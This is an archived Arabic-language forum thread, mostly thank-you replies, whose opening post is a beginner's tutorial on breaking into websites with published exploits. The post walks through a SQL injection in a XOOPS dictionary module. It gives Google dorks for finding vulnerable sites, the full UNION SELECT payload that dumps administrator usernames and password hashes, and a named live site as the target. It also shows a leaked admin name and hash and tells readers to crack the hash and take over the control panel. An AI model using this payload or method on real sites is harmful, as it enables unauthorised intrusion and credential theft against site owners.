منتديات شبكة خورة العربية

منتديات شبكة خورة العربية (http://www.khorh.net/vb/index.php)
-   الأنترنت والكمبيوتر (http://www.khorh.net/vb/forumdisplay.php?f=29)
-   -   إخترااااااق المنتديات (http://www.khorh.net/vb/showthread.php?t=16126)

The Thunder 06-03-2009 08:03 PM

إخترااااااق المنتديات
 
[hide]تعلم قراءة الثغرات وأختراق المواقع والمنتديات(ادخل مبتدء وأطلع مبدع)

هذا الدرس يـ اخوان الى المبتدئين
يعني المحترفين ما راح يحتاجو الى هذا الدرس
هذا الدرس فقط يساعدك في فهم ومعرفة الثغرات المكتوبه وطريقة الإستفاده منها
الان


نروح الى احد مواقع الثغرات الكثيره
وانا اخترت الميل ورم لانه اسهل واحد
نفتح الصفحة الرئيسيه للموقع

http://www.milw0rm.com/

الي يهمنا في هذي الصفحة هو اختراق المواقع بما ان حنى مبتدئين
الا هي
ثالث خيار

الي لونهم بـ الاصفر
هذول جدد بـ تاريخ اليوم
والي لونهم اخضر يعني اقدم
وطبعا التاريخ مكتوب على جنب
انا بختار وحدة من الثغرات الموجوده
و اخترت هذي الثغره
XOOPS Module Dictionary <= 0.94 Remote SQL Injection Vulnerability
مكتوب فيها كـ التالي

كود:
##########################################
#
# XOOPS Module dictionary(0.94-0.91-0.70)SQL Injection
#
##########################################
#
##AUTHOR : S@BUN
#
####HOME : http://www.milw0rm.com/author/1334
#
####MAİL : hackturkiye.hackturkiye@gmail.com
#
###########################################
#
# DORK 1 : allinurl: "modules/dictionary"
#
# DORK 2 : allinurl: "modules/dictionary/print.php?id"
#
###########################################
EXPLOIT :

modules/dictionary/print.php?id=-9999999/**/union/**/select/**/concat(uname,0x3a,pass),concat(uname,0x3a,pass)/**/from/**/xoops_users/*
###########################################
Dictionary Version 0.94 by nagl.ch
Dictionary Version 0.91 by nagl.ch
Dictionary Version 0.70 by nagl.ch
###########################################
##################S@BUN####################
###########################################
#####hackturkiye.hackturkiye@gmail.com#####
###########################################

# milw0rm.com [2008-03-17]


طيب نشرح شوي شوي
الجزء الاول




كود:
XOOPS Module dictionary(0.94-0.91-0.70)SQL Injection

هذي معلومات عن الثغره
نوعيتها و وين الثغره موجوده و في اي اصدار
طيب
الثغره هذي في سكريبت اسمه XOOPS
وهذي مجله طبعا
على اية حال الثغره في dictionary
الا هو الدليل
والاصدارات هي
0.94-0.91-0.70
والبيانات الي بتجي هذي غير مهمه بـ النسبه لنا
وهي معلومات عن مكتشف الثغره


كود:
#
##AUTHOR : S@BUN
#
####HOME : http://www.milw0rm.com/author/1334
#
####MAİL : hackturkiye.hackturkiye@gmail.com
############################################
والان اهم جزئين
الجزء الاول الدورك

###########################################

كود:
#
# DORK 1 : allinurl: "modules/dictionary"
#
# DORK 2 : allinurl: "modules/dictionary/print.php?id"
#شنو هذا الدورك
هذي الكلمه الي راح تحطها في كلمة البحث عشان تجيب لك المواقع المصابه بـ الثغره
فـ لو كتبت في قوقل


كود:
allinurl: "modules/dictionary"

راح يطلع لك كل المواقع الي موجود فيها هذا
على اية حال
نختار موقع من المواقع
وانا اخترت


كود:
http://www.splatinvestigations.com/m...dictionaryنروح الى الجزاء الثاني المهم
الا وهو


كود:
###########################################
EXPLOIT :

modules/dictionary/print.php?id=-9999999/**/union/**/select/**/concat(uname,0x3a,pass),concat(uname,0x3a,pass)/**/from/**/xoops_users/*
###########################################

وهذا كود الإستغلال
يعني راح ننسخ هذا الكود ونحطه في الموقع الي اخترناه
وراح يصير رابط الموقع مع الاستغلال كذا

كود:
http://www.splatinvestigations.com/m.../xoops_users/*

فورا راح يطلع لنا اليوزر والباسوورد لمدير الموقع
طبعا الموضوع ما ينتهي هنا
الباسوورد مشفر بـ الـ MD5
والـ MD5 هذا نوع من انوع التشفير وهو نوعا ما
لكن البرامج ما قصرت و تقدرو بـ اي برنامج فك باسووردات MD5 انكم تفكو الهاش الي يطلع لكم
على اية حال الان الباسوورد طلع لنا مشفر مع الاسم
يعني الباسوورد مشفر والاسم موجود جنبه
وهم كذا
ARC-753: a19010808cc277ac5cc50548d7a61e8e
الي بـ الون الاحمر هذا الباسوورد المشفر
والي بـ الازرق هذا اسم مدير الموقع الي راح تدخل به لوحة التحكم بعد ما تفك التشفير
النقطتين الرئسيتين فقط لتفريق بينهم
بعد ما تفك باسوورد الموقع
تدخل لوحة تحكم الموقع وتسوي الي يعجبك


بس لا تجربوا على موقعكم هههههه[/hide]

البدوي 06-04-2009 12:56 AM

مشكووووووووووووووووور

ابو فهد 06-04-2009 06:48 AM

شـكــ وبارك الله فيك ـــرا لك ... لك مني أجمل تحية .

البيرق 06-04-2009 07:44 AM

شـكــ وبارك الله فيك ـــرا لك ... لك مني أجمل تحية .

بندر البدراني 06-04-2009 09:04 AM

شـكــ وبارك الله فيك ـــرا لك ... لك مني أجمل تحية .

saqr khorh 06-04-2009 03:47 PM

لا تلعب بالنار ياولد ـهههههههههههههههههههههههههههههههههههههههههـ

المهاجر الجريح 06-11-2009 12:17 AM

مشكووووووووووووووور اخي الغالي

وان شاء الله يكون البرنامج رائع

لاننا بالصراحة مع الملفات دي المخفية

ما عاد بقينا نعرف شيء....

على العموم الف شكر لك على المجهود...

ارق التحايا لك،،

فضل العولقي 06-11-2009 02:01 AM

يعطيك العافيه اخي الرعـــــد
مودتي

صقر شبوة 06-11-2009 02:38 AM

مشكووووووووووووووور على الطرح

صقر شبوة

The Thunder 06-18-2009 10:16 PM

البدوي


القلب الابيض


بندر البدراني

صقر خورة


المهاجر الجريح


سلطان خورة

صقر شبوه



اسعدني تواجدكم

نورتوا

شكراً لردودكم وتفاعلكم ,,حتى لو ردي جاء متاخر لاني لما كنت عضو ما كنت اقدر ادخل الموضوع

بسمة أمل 06-19-2009 01:03 AM

مشكور اخوي

يعطيك العافية


http://www5.0zz0.com/2009/06/17/11/742136509.gif

دمت بخير

جريح خوره 06-19-2009 01:07 AM

[align=center]يعطيك الف عافية اخوي الرعد مقدما

تقبل مروري ودمت بخير حال[/align]

The Thunder 06-20-2009 10:25 AM

أ‡أ‍أٹأˆأ‡أ“:

أ‡أ،أ£أ”أ‡أ‘أںأ‰ أ‡أ،أƒأ•أ،أأ‰ أںأٹأˆأٹ أˆأ¦أ‡أ“أکأ‰ ابتسامة الأمل (أ‡أ،أ£أ”أ‡أ‘أںأ‰ 142992)
مشكور اخوي

يعطيك العافية


http://www5.0zz0.com/2009/06/17/11/742136509.gif

دمت بخير




العفو




اسعدني تواجدك

The Thunder 06-20-2009 10:26 AM

أ‡أ‍أٹأˆأ‡أ“:

أ‡أ،أ£أ”أ‡أ‘أںأ‰ أ‡أ،أƒأ•أ،أأ‰ أںأٹأˆأٹ أˆأ¦أ‡أ“أکأ‰ جريح خوره (أ‡أ،أ£أ”أ‡أ‘أںأ‰ 142996)
[align=center]يعطيك الف عافية اخوي الرعد مقدما

تقبل مروري ودمت بخير حال[/align]




واياك يارب



اسعدني تواجدك

نورت

المهاجر الجريح 06-20-2009 11:18 AM

ممكن توضح لنا طريقة استخراج

الاكواد

تحياتي

The Thunder 06-20-2009 11:24 AM

استخراج الاكواد من موقع

ميل وورم


www.milw0rm.com

الأسد الجريح 06-24-2009 02:44 AM

شـكــ وبارك الله فيك ـــرا لك ... لك مني أجمل تحية .

The Thunder 07-21-2009 08:00 PM

الاسد الجريح


اسعدني تواجدك شكراً لك

رناا 07-25-2009 01:51 PM

The Thunder
http://akhawat.islamway.com/forum/up...1188455646.gif

The Thunder 07-25-2009 02:23 PM

أ‡أ‍أٹأˆأ‡أ“:

أ‡أ،أ£أ”أ‡أ‘أںأ‰ أ‡أ،أƒأ•أ،أأ‰ أںأٹأˆأٹ أˆأ¦أ‡أ“أکأ‰ رناا (أ‡أ،أ£أ”أ‡أ‘أںأ‰ 159282)



الله يسلمك

نورتي الصفحة بتواجدك يا الغلا

حبيشى بنى سويف 07-31-2009 05:35 PM

[gdwl]
بسم الله الرحمن الرحيم
السلام عليكم ورحمة الله وبركاته
شـكــ وبارك الله فيك ـــرا لك ... لك مني أجمل تحية .
ألف مبروك .. لقد سعدت بهذا الخبر
[/gdwl]

فريد العولقي 07-31-2009 06:13 PM

انا بصراحة وبكل وضوح ضد اني ارد على موضوع بدون ان اقراءة ولا تريد رد والسلام

The Thunder 07-31-2009 07:19 PM

أ‡أ‍أٹأˆأ‡أ“:

أ‡أ،أ£أ”أ‡أ‘أںأ‰ أ‡أ،أƒأ•أ،أأ‰ أںأٹأˆأٹ أˆأ¦أ‡أ“أکأ‰ حبيشى بنى سويف (أ‡أ،أ£أ”أ‡أ‘أںأ‰ 161655)
[gdwl]
بسم الله الرحمن الرحيم
السلام عليكم ورحمة الله وبركاته
شـكــ وبارك الله فيك ـــرا لك ... لك مني أجمل تحية .
ألف مبروك .. لقد سعدت بهذا الخبر
[/gdwl]


وعليكم السلام ورحمة الله وبركاته....

The Thunder 07-31-2009 07:19 PM

أ‡أ‍أٹأˆأ‡أ“:

أ‡أ،أ£أ”أ‡أ‘أںأ‰ أ‡أ،أƒأ•أ،أأ‰ أںأٹأˆأٹ أˆأ¦أ‡أ“أکأ‰ فريد العولقي (أ‡أ،أ£أ”أ‡أ‘أںأ‰ 161663)
انا بصراحة وبكل وضوح ضد اني ارد على موضوع بدون ان اقراءة ولا تريد رد والسلام


اهلا وسهلا

بالرغم اني ولا فهمت شيء

سلام


أ‡أ،أ“أ‡أڑأ‰ أ‡أ،أ‚أ¤ 02:52 PM

Powered by vBulletin® Copyright ©2000 - 2026, Jelsoft Enterprises Ltd. TranZ By Almuhajir